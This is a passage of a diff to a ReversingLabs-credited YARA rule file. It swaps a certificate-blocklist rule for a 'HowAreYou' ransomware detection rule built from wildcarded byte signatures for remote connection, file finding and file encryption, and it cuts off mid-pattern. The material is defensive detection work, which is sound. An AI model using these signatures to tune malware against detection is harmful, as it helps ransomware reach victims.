68 ?? ?? ?? ?? 8B D3 8D 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 59 84 C0 + 0F 84 ?? ?? ?? ?? 55 68 ?? ?? ?? ?? 8D 44 24 ?? 6A ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D + 44 24 ?? 50 8D 84 24 ?? ?? ?? ?? 50 C7 44 24 ?? ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8B E8 + 83 FD ?? 0F 84 ?? ?? ?? ?? 8D 4C 24 ?? E8 ?? ?? ?? ?? 84 C0 0F 85 ?? ?? ?? ?? 8B 44 + 24 ?? 83 E0 ?? 74 ?? F6 84 24 ?? ?? ?? ?? ?? 75 ?? 85 C0 75 ?? F6 84 24 ?? ?? ?? ?? + ?? 74 ?? 33 F6 85 FF 74 ?? 8B 44 24 ?? FF 34 B0 8D 44 24 ?? 50 FF 15 ?? ?? ?? ?? 85 + C0 75 ?? 46 3B F7 72 ?? EB ?? FF B4 24 ?? ?? ?? ?? 8D 44 24 ?? 50 53 FF 94 24 ?? ?? + ?? ?? 83 C4 ?? 85 C0 0F 84 ?? ?? ?? ?? 83 BC 24 ?? ?? ?? ?? ?? 74 ?? FF B4 24 ?? ?? + ?? ?? FF 15 ?? ?? ?? ?? 8B 74 24 ?? F6 44 24 ?? ?? 74 ?? F6 84 24 ?? ?? ?? ?? ?? 74 + ?? 8D 44 24 ?? 50 8B D3 8D 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 59 84 C0 74 ?? 83 BC 24 + ?? ?? ?? ?? ?? 74 ?? FF B4 24 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? FF B4 24 ?? ?? ?? ?? 8B + D6 FF B4 24 ?? ?? ?? ?? 8D 8C 24 ?? ?? ?? ?? FF B4 24 ?? ?? ?? ?? FF B4 24 ?? ?? ?? + ?? FF B4 24 ?? ?? ?? ?? 57 E8 ?? ?? ?? ?? 83 C4 ?? 8D 44 24 ?? 50 55 FF 15 ?? ?? ?? + ?? 85 C0 0F 85 ?? ?? ?? ?? EB ?? 83 64 24 ?? ?? 55 FF 15 ?? ?? ?? ?? 5D 5F 5E 5B 81 + C4 ?? ?? ?? ?? C3 + } + $find_files_2 = { + 81 EC ?? ?? ?? ?? 8D 44 24 ?? 53 55 56 68 ?? ?? ?? ?? 50 8B D9 FF 15 ?? ?? ?? ?? 8B + F0 85 F6 0F 84 ?? ?? ?? ?? 8D 6C 24 ?? 8D 6C 75 ?? 33 C0 66 89 44 74 ?? 68 ?? ?? ?? + ?? 8D 44 24 ?? 50 FF 15 ?? ?? ?? ?? 6A ?? 59 E8 ?? ?? ?? ?? 83 C0 ?? 6A ?? 59 66 89 + 45 ?? E8 ?? ?? ?? ?? 83 C0 ?? 66 89 44 74 ?? 8D 84 24 ?? ?? ?? ?? 50 8D 44 24 ?? 50 + FF 15 ?? ?? ?? ?? 83 F8 ?? 74 ?? 50 FF 15 ?? ?? ?? ?? 8D 8C 24 ?? ?? ?? ?? E8 ?? ?? + ?? ?? 84 C0 74 ?? 8D 84 24 ?? ?? ?? ?? 50 55 FF 15 ?? ?? ?? ?? 83 64 24 ?? ?? 8D 44 + 24 ?? 50 8D 44 24 ?? 50 FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 8D 44 24 ?? 50 53 + FF 15 ?? ?? ?? ?? 5E 5D 5B 81 C4 ?? ?? ?? ?? C3 + } + $find_files_3 = { + 81 EC ?? ?? ?? ?? 53 55 56 8B D9 57 8B FA 85 DB 74 ?? 33 D2 E8 ?? ?? ?? ?? 8B F0 85 + F6 0F 84 ?? ?? ?? ?? 57 56 8D 84 24 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? + 83 C4 ?? 8B CE E8 ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ?? 50 C6 43 ?? ?? FF 15 ?? ?? ?? ?? + 0D ?? ?? ?? ?? 50 8D 84 24 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 84 24 + ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? EB ?? 57 FF 15 ?? ?? ?? ?? 0D ?? ?? ?? ?? 50 57 FF + 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8B D7 8D 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 59 84 C0 0F + 84 ?? ?? ?? ?? 8B B4 24 ?? ?? ?? ?? 80 7E ?? ?? 75 ?? 8B 15 ?? ?? ?? ?? 8D 8C 24 ?? + ?? ?? ?? E8 ?? ?? ?? ?? 84 C0 0F 85 ?? ?? ?? ?? 8D 44 24 ?? 50 8D 84 24 ?? ?? ?? ?? + 50 FF 15 ?? ?? ?? ?? 8B E8 83 FD ?? 0F 84 ?? ?? ?? ?? 83 64 24 ?? ?? 6A ?? FF 35 ?? + ?? ?? ?? FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 8D 4C 24 ?? E8 ?? ?? ?? ?? 84 C0 + 0F 85 ?? ?? ?? ?? F7 44 24 ?? ?? ?? ?? ?? 0F 85 ?? ?? ?? ?? 83 7C 24 ?? ?? 75 ?? 56 + 57 FF 15 ?? ?? ?? ?? 50 8B D7 8B CB E8 ?? ?? ?? ?? 59 59 89 44 24 ?? 85 C0 0F 84 ?? + ?? ?? ?? 8D 44 24 ?? 50 FF 15 ?? ?? ?? ?? 50 8D 44 24 ?? 50 FF 15 ?? ?? ?? ?? F6 44 + 24 ?? ?? 74 ?? 80 7E ?? ?? 75 ?? 6A ?? FF 15 ?? ?? ?? ?? 8B 4C 24 ?? 56 FF B4 24 ?? + ?? ?? ?? 8D 54 24 ?? E8 ?? ?? ?? ?? 59 59 EB ?? 80 7E ?? ?? 74 ?? 85 DB 74 ?? 83 7C + 24 ?? ?? 7C ?? 7F ?? 81 7C 24 ?? ?? ?? ?? ?? 72 ?? 80 3E ?? 74 ?? 6A ?? 8D 44 24 ?? + 50 FF 15 ?? ?? ?? ?? 85 C0 74 ?? 56 8D 44 24 ?? 50 FF 74 24 ?? FF 94 24 ?? ?? ?? ?? + 83 C4 ?? 85 C0 74 ?? 8D 44 24 ?? 50 55 FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 55 + FF 15 ?? ?? ?? ?? 5F 5E 5D 5B 81 C4 ?? ?? ?? ?? C3 + } + condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Kivaliz Prest s.r.l." and (pe.signatures[i].serial=="00:9c:fb:b4:c6:90:08:82:1a:aa:ce:cd:e9:7e:e1:49:ab" or pe.signatures[i].serial=="9c:fb:b4:c6:90:08:82:1a:aa:ce:cd:e9:7e:e1:49:ab") and 1592363914<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and ( all of ($find_files_*)) and ( all of ($encrypt_files_*)) } -import "pe" - -rule REVERSINGLABS_Cert_Blocklist_C04F5D17Af872Cb2C37E3367Fe761D0D : INFO FILE +rule REVERSINGLABS_Win32_Ransomware_Howareyou : TC_DETECTION MALICIOUS MALWARE FILE { meta: - description = "Certificate used for digitally signing malware." + description = "Yara rule that detects HowAreYou ransomware." author = "ReversingLabs" - id = "d7ef2bdf-afba-5254-bef2-78f4b6d5ecea" - date = "2023-11-08" - modified = "2023-11-08" + id = "998fbebe-099d-5779-ad4a-91b7b6c8ad6b" + date = "2021-06-14" + modified = "2021-06-14" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L4364-L4382" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "4a4d60aa3722a710fe23d5e11c55a28bfe721bb4e797b041d58f62a994487799" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/ransomware/Win32.Ransomware.HowAreYou.yara#L1-L205" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "90568365aac61d120886f9efa9822ccc23df79a1a55e522c81db6e77477c4f04" score = 75 quality = 90 - tags = "INFO, FILE" + tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE" status = "RELEASED" sharing = "TLP:WHITE" - category = "INFO" + category = "MALWARE" + tc_detection_type = "Ransomware" + tc_detection_name = "HowAreYou" + tc_detection_factor = 5 importance = 25 + strings: + $remote_connection_p1 = { + 64 8B 0D ?? ?? ?? ?? 8B 89 ?? ?? ?? ?? 3B 61 ?? 0F 86 ?? ?? ?? ?? 83 EC ?? 8B 05 ?? + ?? ?? ?? C7 40 ?? ?? ?? ?? ?? 8B 0D ?? ?? ?? ?? 85 C9 0F 85 ?? ?? ?? ?? 8D 0D ?? ?? + ?? ?? 89 08 8B 05 ?? ?? ?? ?? 8D 0D ?? ?? ?? ?? 89 0C 24 89 44 24 ?? E8 ?? ?? ?? ?? + 8B 44 24 ?? 8B 4C 24 ?? 8B 54 24 ?? 8B 5C 24 ?? 8B 6C 24 ?? 85 C9 74 ?? 74 ?? 8B 49 + ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 89 4C 24 ?? 89 44 24 ?? 8D 44 24 + ?? 89 04 24 C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 90 E8 ?? + ?? ?? ?? 83 C4 ?? C3 89 54 24 ?? 89 5C 24 ?? 89 6C 24 ?? 8D 05 ?? ?? ?? ?? 89 04 24 + C7 44 24 ?? ?? ?? ?? ?? 8B 05 ?? ?? ?? ?? 8B 0D ?? ?? ?? ?? 89 4C 24 ?? 89 44 24 ?? + E8 ?? ?? ?? ?? 8B 44 24 ?? 8B 4C 24 ?? 8B 54 24 ?? 8B 5C 24 ?? 85 D2 74 ?? 74 ?? 8B + 4A ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 89 4C 24 ?? 89 44 24 ?? 8D 05 + ?? ?? ?? ?? 89 04 24 C7 44 24 ?? ?? ?? ?? ?? 8D 44 24 ?? 89 44 24 ?? C7 44 24 ?? ?? + ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 90 E8 ?? ?? ?? ?? 83 C4 ?? C3 89 D1 + } + $remote_connection_p2 = { + EB ?? 89 4C 24 ?? 89 5C 24 ?? 84 03 89 4C 24 ?? C7 04 24 ?? ?? ?? ?? 8D 43 ?? 89 44 + 24 ?? E8 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 8B 44 24 ?? 8B 48 ?? 8B 54 24 ?? 89 54 + 24 ?? 8B 54 24 ?? 89 54 24 ?? 8B 54 24 ?? 89 54 24 ?? 8B 54 24 ?? 89 14 24 FF D1 8B + 44 24 ?? 8B 4C 24 ?? 85 C0 74 ?? 74 ?? 8B 40 ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? + ?? ?? ?? ?? 89 44 24 ?? 89 4C 24 ?? 8D 05 ?? ?? ?? ?? 89 04 24 C7 44 24 ?? ?? ?? ?? + ?? 8D 44 24 ?? 89 44 24 ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? E8 ?? ?? + ?? ?? 90 E8 ?? ?? ?? ?? 83 C4 ?? C3 8D 05 ?? ?? ?? ?? 89 04 24 C7 44 24 ?? ?? ?? ?? + ?? C7 44 24 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 44 24 ?? 8B 4C 24 ?? 8B 54 24 ?? 8B 5C + 24 ?? 8B 5B ?? 89 44 24 ?? 89 4C 24 ?? 89 54 24 ?? 8B 44 24 ?? 89 04 24 FF D3 90 E8 + ?? ?? ?? ?? 83 C4 ?? C3 90 E8 ?? ?? ?? ?? 83 C4 ?? C3 89 04 24 8D 05 ?? ?? ?? ?? 89 + 44 24 ?? E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? E8 ?? ?? ?? ?? E9 + } + $find_files_p1 = { + 64 8B 0D ?? ?? ?? ?? 8B 89 ?? ?? ?? ?? 8D 44 24 ?? 3B 41 ?? 0F 86 ?? ?? ?? ?? 81 EC + ?? ?? ?? ?? 8B 84 24 ?? ?? ?? ?? 89 04 24 8B 8C 24 ?? ?? ?? ?? 89 4C 24 ?? E8 ?? ?? + ?? ?? 8B 44 24 ?? 8B 4C 24 ?? 8B 54 24 ?? 8B 5C 24 ?? 85 C9 0F 85 ?? ?? ?? ?? 89 54 + 24 ?? 89 9C 24 ?? ?? ?? ?? 31 C0 31 C9 31 ED 31 F6 EB ?? 8B 7C 24 ?? 47 8B 9C 24 ?? + ?? ?? ?? 89 CD 89 C6 89 F8 89 D1 8B 54 24 ?? 39 D0 0F 8D ?? ?? ?? ?? 89 44 24 ?? 89 + 4C 24 ?? 89 AC 24 ?? ?? ?? ?? 89 74 24 ?? 8D 0C C3 8B 11 89 94 24 ?? ?? ?? ?? 8B 49 + ?? 89 8C 24 ?? ?? ?? ?? 8B 6A ?? 89 0C 24 FF D5 0F B6 44 24 ?? 84 C0 0F 84 ?? ?? ?? + ?? 8B 84 24 ?? ?? ?? ?? 8B 40 ?? 8B 8C 24 ?? ?? ?? ?? 89 0C 24 FF D0 8B 44 24 ?? 8B + 4C 24 ?? 89 0C 24 89 44 24 ?? E8 ?? ?? ?? ?? 8B 44 24 ?? 8B 4C 24 ?? 85 C0 0F 86 ?? + ?? ?? ?? 0F B6 11 80 FA ?? 75 ?? 8B 44 24 ?? 8B 8C 24 ?? ?? ?? ?? 8B 54 24 ?? E9 ?? + ?? ?? ?? 80 FA ?? 74 ?? 89 44 24 ?? 89 8C 24 ?? ?? ?? ?? 89 0C 24 89 44 24 ?? 8B 15 + ?? ?? ?? ?? 8B 1D ?? ?? ?? ?? 8B 2D ?? ?? ?? ?? 89 6C 24 ?? 89 5C 24 ?? 89 54 24 ?? + E8 ?? ?? ?? ?? 0F B6 44 24 ?? 84 C0 74 ?? 8B 44 24 ?? 8B 8C 24 ?? ?? ?? ?? 8B 54 24 + ?? E9 ?? ?? ?? ?? 8B 44 24 ?? 83 F8 ?? 0F 85 ?? ?? ?? ?? 8B 8C 24 ?? ?? ?? ?? 8B 11 + } + $find_files_p2 = { + 81 FA ?? ?? ?? ?? 75 ?? 0F B7 51 ?? 66 81 FA ?? ?? 75 ?? 0F B6 51 ?? 80 FA ?? 0F 84 + ?? ?? ?? ?? C7 04 24 ?? ?? ?? ?? 8B 94 24 ?? ?? ?? ?? 89 54 24 ?? 8B 9C 24 ?? ?? ?? + ?? 89 5C 24 ?? 8D 2D ?? ?? ?? ?? 89 6C 24 ?? C7 44 24 ?? ?? ?? ?? ?? 89 4C 24 ?? 89 + 44 24 ?? E8 ?? ?? ?? ?? 8B 44 24 ?? 8B 4C 24 ?? 89 04 24 89 4C 24 ?? E8 ?? ?? ?? ?? + 8B 44 24 ?? 8D 48 ?? 8B 54 24 ?? 8B 5C 24 ?? 8B 6C 24 ?? 39 E9 7F ?? 8B B4 24 ?? ?? + ?? ?? 8D 7C C6 ?? 89 1F 8D 04 C6 8B 1D ?? ?? ?? ?? 85 DB 75 ?? 89 10 89 E8 89 CA 89 + F1 E9 ?? ?? ?? ?? 89 B4 24 ?? ?? ?? ?? 89 4C 24 ?? 89 6C 24 ?? 89 04 24 89 54 24 ?? + E8 ?? ?? ?? ?? 8B 4C 24 ?? 8B 6C 24 ?? 8B B4 24 ?? ?? ?? ?? EB ?? 89 94 24 ?? ?? ?? + ?? 89 5C 24 ?? 8D 15 ?? ?? ?? ?? 89 14 24 8B 9C 24 ?? ?? ?? ?? 89 5C 24 ?? 89 44 24 + ?? 89 6C 24 ?? 89 4C 24 ?? E8 ?? ?? ?? ?? 8B 74 24 ?? 8B 44 24 ?? 8B 6C 24 ?? 8D 48 + ?? 8B 44 24 ?? 8B 94 24 ?? ?? ?? ?? 8B 5C 24 ?? E9 ?? ?? ?? ?? 8D 54 24 ?? 89 14 24 + 8B 94 24 ?? ?? ?? ?? 89 54 24 ?? 8B 9C 24 ?? ?? ?? ?? 89 5C 24 ?? 8D 2D ?? ?? ?? ?? + 89 6C 24 ?? C7 44 24 ?? ?? ?? ?? ?? 89 4C 24 ?? 89 44 24 ?? E8 ?? ?? ?? ?? 8B 44 24 + ?? 8B 4C 24 ?? 89 0C 24 89 44 24 ?? E8 ?? ?? ?? ?? 8B 44 24 ?? 8B 8C 24 ?? ?? ?? ?? + E9 ?? ?? ?? ?? 8B 8C 24 ?? ?? ?? ?? E9 ?? ?? ?? ?? 8B 84 24 ?? ?? ?? ?? 8B 40 ?? 8B + } + $find_files_p3 = { + 8C 24 ?? ?? ?? ?? 89 0C 24 FF D0 8B 44 24 ?? 8B 4C 24 ?? 89 0C 24 89 44 24 ?? E8 ?? + ?? ?? ?? 8B 44 24 ?? 89 44 24 ?? 8B 4C 24 ?? 89 4C 24 ?? 89 04 24 89 4C 24 ?? 8B 15 + ?? ?? ?? ?? 8B 1D ?? ?? ?? ?? 8B 2D ?? ?? ?? ?? 89 6C 24 ?? 89 5C 24 ?? 89 54 24 ?? + E8 ?? ?? ?? ?? 0F B6 44 24 ?? 84 C0 74 ?? 8B 44 24 ?? 8B 8C 24 ?? ?? ?? ?? 8B 54 24 + ?? E9 ?? ?? ?? ?? 8B 44 24 ?? 89 04 24 8B 4C 24 ?? 89 4C 24 ?? E8 ?? ?? ?? ?? 8B 44 + 24 ?? 89 84 24 ?? ?? ?? ?? 8B 4C 24 ?? 89 4C 24 ?? C7 04 24 ?? ?? ?? ?? 8B 94 24 ?? + ?? ?? ?? 89 54 24 ?? 8B 9C 24 ?? ?? ?? ?? 89 5C 24 ?? 8D 2D ?? ?? ?? ?? 89 6C 24 ?? + C7 44 24 ?? ?? ?? ?? ?? 8B 74 24 ?? 89 74 24 ?? 8B 74 24 ?? 89 74 24 ?? E8 ?? ?? ?? + ?? 8B 44 24 ?? 89 44 24 ?? 8B 4C 24 ?? 89 4C 24 ?? 8B 94 24 ?? ?? ?? ?? 89 14 24 8B + 5C 24 ?? 89 5C 24 ?? 8B 2D ?? ?? ?? ?? 8B 35 ?? ?? ?? ?? 8B 3D ?? ?? ?? ?? 89 6C 24 + ?? 89 74 24 ?? 89 7C 24 ?? E8 ?? ?? ?? ?? 0F B6 44 24 ?? 84 C0 0F 84 ?? ?? ?? ?? 8B + 84 24 ?? ?? ?? ?? 85 C0 0F 86 ?? ?? ?? ?? 8B 84 24 ?? ?? ?? ?? 0F B6 08 83 C1 ?? 88 + 4C 24 ?? 0F B6 08 83 C1 ?? 88 4C 24 ?? 8D 0D ?? ?? ?? ?? 89 0C 24 8B 15 ?? ?? ?? ?? + 89 54 24 ?? 8D 54 24 ?? 89 54 24 ?? E8 ?? ?? ?? ?? 8B 44 24 ?? 8B 48 ?? 8D 51 ?? 8B + 18 8B 40 ?? 39 C2 0F 8F ?? ?? ?? ?? 89 9C 24 ?? ?? ?? ?? 89 54 24 ?? 89 44 24 ?? 8D + } + $find_files_p4 = { + 6C CB ?? 8B 74 24 ?? 89 75 ?? 8B 2D ?? ?? ?? ?? 8D 0C CB 85 ED 75 ?? 8B 6C 24 ?? 89 + 29 8D 05 ?? ?? ?? ?? 89 04 24 8B 0D ?? ?? ?? ?? 89 4C 24 ?? 8D 4C 24 ?? 89 4C 24 ?? + E8 ?? ?? ?? ?? 8B 44 24 ?? 8B 4C 24 ?? 89 48 ?? 8B 4C 24 ?? 89 48 ?? 8B 0D ?? ?? ?? + ?? 85 C9 75 ?? 8B 8C 24 ?? ?? ?? ?? 89 08 8B 6C 24 ?? 8B 4C 24 ?? 8B B4 24 ?? ?? ?? + ?? E9 ?? ?? ?? ?? 89 04 24 8B 84 24 ?? ?? ?? ?? 89 44 24 ?? E8 ?? ?? ?? ?? EB ?? 89 + 0C 24 8B 44 24 ?? 89 44 24 ?? E8 ?? ?? ?? ?? EB ?? 89 4C 24 ?? 8D 2D ?? ?? ?? ?? 89 + 2C 24 89 5C 24 ?? 89 4C 24 ?? 89 44 24 ?? 89 54 24 ?? E8 ?? ?? ?? ?? 8B 5C 24 ?? 8B + 44 24 ?? 8B 4C 24 ?? 8D 50 ?? 89 C8 8B 4C 24 ?? E9 ?? ?? ?? ?? 8B 84 24 ?? ?? ?? ?? + 89 04 24 8B 44 24 ?? 89 44 24 ?? 8B 05 ?? ?? ?? ?? 8B 0D ?? ?? ?? ?? 8B 15 ?? ?? ?? + ?? 89 44 24 ?? 89 4C 24 ?? 89 54 24 ?? E8 ?? ?? ?? ?? 0F B6 44 24 ?? 84 C0 74 ?? 8B + 44 24 ?? 8B 8C 24 ?? ?? ?? ?? 8B 54 24 ?? E9 ?? ?? ?? ?? 8B 84 24 ?? ?? ?? ?? 85 C0 + 0F 86 ?? ?? ?? ?? 8B 84 24 ?? ?? ?? ?? 0F B6 08 88 4C 24 ?? 0F B6 08 88 4C 24 ?? 8D + } + $find_files_p5 = { + 0D ?? ?? ?? ?? 89 0C 24 8B 15 ?? ?? ?? ?? 89 54 24 ?? 8D 54 24 ?? 89 54 24 ?? E8 ?? + ?? ?? ?? 8B 44 24 ?? 8B 48 ?? 8D 51 ?? 8B 18 8B 40 ?? 39 C2 0F 8F ?? ?? ?? ?? 89 9C + 24 ?? ?? ?? ?? 89 54 24 ?? 89 44 24 ?? 8D 6C CB ?? 8B 74 24 ?? 89 75 ?? 8B 2D ?? ?? + ?? ?? 8D 0C CB 85 ED 75 ?? 8B 6C 24 ?? 89 29 8D 05 ?? ?? ?? ?? 89 04 24 8B 0D ?? ?? + ?? ?? 89 4C 24 ?? 8D 4C 24 ?? 89 4C 24 ?? E8 ?? ?? ?? ?? 8B 44 24 ?? 8B 4C 24 ?? 89 + 48 ?? 8B 4C 24 ?? 89 48 ?? 8B 0D ?? ?? ?? ?? 85 C9 75 ?? 8B 8C 24 ?? ?? ?? ?? 89 08 + E9 ?? ?? ?? ?? 89 04 24 8B 84 24 ?? ?? ?? ?? 89 44 24 ?? E8 ?? ?? ?? ?? E9 ?? ?? ?? + ?? 89 0C 24 8B 44 24 ?? 89 44 24 ?? E8 ?? ?? ?? ?? EB ?? 89 4C 24 ?? 8D 2D ?? ?? ?? + ?? 89 2C 24 89 5C 24 ?? 89 4C 24 ?? 89 44 24 ?? 89 54 24 ?? E8 ?? ?? ?? ?? 8B 5C 24 + ?? 8B 44 24 ?? 8B 4C 24 ?? 8D 50 ?? 89 C8 8B 4C 24 ?? E9 ?? ?? ?? ?? 89 AC 24 ?? ?? + ?? ?? 89 8C 24 ?? ?? ?? ?? 89 B4 24 ?? ?? ?? ?? C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? C7 + 84 24 ?? ?? ?? ?? ?? ?? ?? ?? 81 C4 ?? ?? ?? ?? C3 C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? + C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? 89 8C 24 ?? ?? ?? + ?? 89 84 24 ?? ?? ?? ?? 81 C4 ?? ?? ?? ?? C3 E8 + } + $encrypt_files_p1 = { + 64 8B 0D ?? ?? ?? ?? 8B 89 ?? ?? ?? ?? 8D 44 24 ?? 3B 41 ?? 0F 86 ?? ?? ?? ?? 81 EC + ?? ?? ?? ?? 8B 05 ?? ?? ?? ?? C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? C7 84 24 ?? ?? ?? ?? + ?? ?? ?? ?? 8B 40 ?? 89 04 24 8D 84 24 ?? ?? ?? ?? 89 44 24 ?? E8 ?? ?? ?? ?? 8B 84 + 24 ?? ?? ?? ?? 8B 8C 24 ?? ?? ?? ?? 8D 15 ?? ?? ?? ?? 39 CA 0F 85 ?? ?? ?? ?? 8B 48 + ?? 89 4C 24 ?? 8B 00 89 84 24 ?? ?? ?? ?? C7 04 24 ?? ?? ?? ?? 89 44 24 ?? 89 4C 24 + ?? 8B 15 ?? ?? ?? ?? 8B 1D ?? ?? ?? ?? 89 54 24 ?? 89 5C 24 ?? E8 ?? ?? ?? ?? 8B 44 + 24 ?? 89 44 24 ?? 8B 4C 24 ?? 89 4C 24 ?? C6 44 24 ?? ?? C7 84 24 ?? ?? ?? ?? ?? ?? + ?? ?? C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? 8D 54 24 ?? 89 54 24 ?? 8B 94 24 ?? ?? ?? ?? + 89 54 24 ?? 8B 5C 24 ?? 89 5C 24 ?? 8D AC 24 ?? ?? ?? ?? 89 6C 24 ?? 89 4C 24 ?? 89 + 44 24 ?? C7 04 24 ?? ?? ?? ?? 8D 2D ?? ?? ?? ?? 89 6C 24 ?? E8 ?? ?? ?? ?? 85 C0 0F + 85 ?? ?? ?? ?? 8B 84 24 ?? ?? ?? ?? 89 04 24 8B 4C 24 ?? 89 4C 24 ?? C7 44 24 ?? ?? + ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 44 24 ?? 8B 4C 24 ?? 8B 54 24 ?? + 85 D2 0F 85 ?? ?? ?? ?? 89 44 24 ?? 89 44 24 ?? C7 04 24 ?? ?? ?? ?? 8D 0D ?? ?? ?? + ?? 89 4C 24 ?? E8 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 8B 44 24 ?? 89 04 24 8B 44 24 + ?? 89 44 24 ?? E8 ?? ?? ?? ?? 8B 44 24 ?? 8B 4C 24 ?? 8B 54 24 ?? 85 D2 0F 85 ?? ?? + ?? ?? 89 44 24 ?? C7 04 24 ?? ?? ?? ?? 8D 05 ?? ?? ?? ?? 89 44 24 ?? E8 + } + $encrypt_files_p2 = { + 85 C0 0F 85 ?? ?? ?? ?? 8D 05 ?? ?? ?? ?? 89 04 24 C7 44 24 ?? ?? ?? ?? ?? C7 44 24 + ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 44 24 ?? 89 44 24 ?? 8B 4C 24 ?? 89 4C 24 ?? 8B 54 + 24 ?? 89 54 24 ?? 89 14 24 89 4C 24 ?? 89 44 24 ?? E8 ?? ?? ?? ?? 8B 44 24 ?? 8B 4C + 24 ?? 85 C9 0F 85 ?? ?? ?? ?? 8B 05 ?? ?? ?? ?? 8B 0D ?? ?? ?? ?? 8B 15 ?? ?? ?? ?? + 89 14 24 89 4C 24 ?? 89 44 24 ?? E8 ?? ?? ?? ?? 8B 44 24 ?? 8B 4C 24 ?? 8B 54 24 ?? + 8B 5C 24 ?? 85 C9 0F 85 ?? ?? ?? ?? 89 1C 24 89 54 24 ?? 8B 44 24 ?? 89 44 24 ?? 8B + 4C 24 ?? 89 4C 24 ?? 8B 54 24 ?? 89 54 24 ?? E8 ?? ?? ?? ?? 8B 44 24 ?? 89 44 24 ?? + 8B 4C 24 ?? 89 4C 24 ?? 8D 15 ?? ?? ?? ?? 89 14 24 8B 15 ?? ?? ?? ?? 8B 1D ?? ?? ?? + ?? 8B 2D ?? ?? ?? ?? 89 54 24 ?? 89 5C 24 ?? 89 6C 24 ?? E8 ?? ?? ?? ?? 8B 44 24 ?? + 89 44 24 ?? 8B 4C 24 ?? 89 4C 24 ?? 8D 15 ?? ?? ?? ?? 89 14 24 C7 44 24 ?? ?? ?? ?? + ?? C7 44 24 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 44 24 ?? 89 84 24 ?? ?? ?? ?? 8B 4C 24 + ?? 89 4C 24 ?? 8B 54 24 ?? 89 54 24 ?? 8B 5C 24 ?? 89 1C 24 8B 6C 24 ?? 89 6C 24 ?? + 8B 6C 24 ?? 89 6C 24 ?? 8B 6C 24 ?? 89 6C 24 ?? E8 ?? ?? ?? ?? 8B 44 24 ?? 8B 4C 24 + ?? 85 C0 0F 85 ?? ?? ?? ?? 31 C0 EB ?? 8B 4C 24 ?? 8B 54 24 ?? 8D 04 0A 89 44 24 ?? + 8B 4C 24 ?? 89 0C 24 8B 94 24 ?? ?? ?? ?? 89 54 24 ?? 8B 5C 24 ?? 89 5C 24 ?? 8B 6C + 24 ?? 89 6C 24 ?? E8 ?? ?? ?? ?? 8B 44 24 ?? 89 44 24 ?? 8B 4C 24 ?? 89 4C 24 ?? 8B + 54 24 ?? 89 54 24 ?? 85 C9 74 ?? 8B 1D ?? ?? ?? ?? 39 D9 0F 85 ?? ?? ?? ?? 89 0C 24 + } + $encrypt_files_p3 = { + 89 54 24 ?? 8B 05 ?? ?? ?? ?? 89 44 24 ?? E8 ?? ?? ?? ?? 0F B6 44 24 ?? 84 C0 0F 84 + ?? ?? ?? ?? 8D 05 ?? ?? ?? ?? 89 04 24 8B 4C 24 ?? 89 4C 24 ?? 89 4C 24 ?? E8 ?? ?? + ?? ?? 8B 44 24 ?? 8B 4C 24 ?? 8B 54 24 ?? 8B 5C 24 ?? 8B 6C 24 ?? 39 EB 0F 87 ?? ?? + ?? ?? 89 44 24 ?? 89 4C 24 ?? 89 54 24 ?? 8B 74 24 ?? 8B 7E ?? 89 44 24 ?? 89 4C 24 + ?? 89 54 24 ?? 8B B4 24 ?? ?? ?? ?? 89 74 24 ?? 89 5C 24 ?? 89 6C 24 ?? 8B 6C 24 ?? + 89 2C 24 FF D7 8B 44 24 ?? 8B 48 ?? 8B 54 24 ?? 89 54 24 ?? 8B 5C 24 ?? 89 5C 24 ?? + 8B 6C 24 ?? 89 6C 24 ?? 8B 74 24 ?? 89 34 24 FF D1 8B 44 24 ?? 89 